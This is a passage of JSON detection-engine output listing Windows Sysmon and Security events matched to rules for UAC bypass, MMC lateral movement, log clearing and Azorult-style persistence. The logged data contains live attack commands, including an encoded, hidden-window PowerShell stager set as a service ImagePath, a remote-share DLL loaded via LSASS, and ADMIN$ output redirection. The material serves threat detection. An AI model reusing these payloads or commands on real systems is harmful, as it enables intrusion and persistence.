22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311388,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:06:20.185107Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\\\\tsclient\\c\\temp\\stack\\a.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\e","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311413,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-10T10:20:37.672486Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"edcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311414,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-10T10:20:37.672499Z"}},"Version":2}}}},{"detection":["Suspicious Shells Spawn by SQL Server"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c set > c:\\users\\\\public\\netstat.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CE3B-5DBE-0000-00201ED50100","LogonId":"0x1d51e","ParentCommandLine":"\"c:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS","ParentImage":"C:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe","ParentProcessGuid":"747F3D96-CE42-5DBE-0000-0010EE430200","ParentProcessId":3936,"ProcessGuid":"747F3D96-DB7C-5DBE-0000-0010CF6B9502","ProcessId":5004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\sqlsvc","UtcTime":"2019-11-03 13:51:56.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":56509,"Execution":{"#attributes":{"ProcessID":3180,"ThreadID":4224}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-11-03T13:51:58.263043Z"}},"Version":5}}}},{"detection":["MMC20 Lateral Movement"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Management Console","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1","Image":"C:\\Windows\\System32\\mmc.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-001087700000","ParentProcessId":612,"ProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ProcessId":3572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:11.856"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9832,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:11.856089Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B180-5CC8-0000-00102BB71E00","ProcessId":1504,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:12.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9833,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:12.449839Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-0010ADBF1E00","ProcessId":3372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9838,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:13.449839Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell","Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ProcessId":1256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.512"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9839,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:13.512339Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ParentProcessId":1256,"ProcessGuid":"365ABB72-B181-5CC8-0000-00108DC71E00","ProcessId":692,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.527"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9840,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:13.543589Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC04.example.corp","Correlation":null,"EventID":1102,"EventRecordID":6272,"Execution":{"#attributes":{"ProcessID":792,"ThreadID":3120}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T19:26:42.116688Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"PC04","SubjectLogonId":"0x128a9","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"}}}}},{"detection":["Registry Entries For Azorult Malware","DLL Load via LSASS"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\\\\172.16.66.254\\shared\\lsadb.dll","EventType":"SetValue","Image":"C:\\WINDOWS\\system32\\svchost.exe","ProcessGuid":"6A3C3EF2-E699-5F7C-0000-001048EF0000","ProcessId":404,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","UtcTime":"2020-10-06 22:11:17.814"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":13,"EventRecordID":345994,"Execution":{"#attributes":{"ProcessID":10204,"ThreadID":2096}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-06T22:11:17.814931Z"}},"Version":2}}}},{"detection":["Hijack Legit RDP Session to Move Laterally","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-14 13:55:57.243","Image":"C:\\Windows\\system32\\mstsc.exe","ProcessGuid":"ECAD0485-C903-5CDA-0000-0010340F1000","ProcessId":2580,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cmd.exe","UtcTime":"2019-05-14 14:04:05.696"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":31145,"Execution":{"#attributes":{"ProcessID":1580,"ThreadID":2324}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T14:04:05.697491Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\ProgramData\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-3991-5D0B-0000-002029350100","LogonId":"0x13529","ParentCommandLine":"\"cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-3ED4-5D0B-0000-0010B2871A00","ParentProcessId":1440,"ProcessGuid":"365ABB72-3ED8-5D0B-0000-0010398F1A00","ProcessId":1476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-20 08:07:52.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8119,"Execution":{"#attributes":{"ProcessID":2020,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-20T08:07:52.956810Z"}},"Version":5}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k localService -p -s RemoteRegistry","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3407-5FCB-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2020-12-04 22:41:04.465"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549016,"Execution":{"#attributes":{"ProcessID":3560,"ThreadID":4600}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-04T22:41:04.470207Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\System32\\Rundll32.exe smssvc.dll,Start","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SUpdate","UtcTime":"2020-12-04 22:41:04.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":549018,"Execution":{"#attributes":{"ProcessID":3560,"ThreadID":4600}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-04T22:41:04.545145Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9805,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:51.949839Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware","PowerShell as a Service in Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\ImagePath","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9806,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:51.981089Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Curl Start Combination","Encoded FromBase64String"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 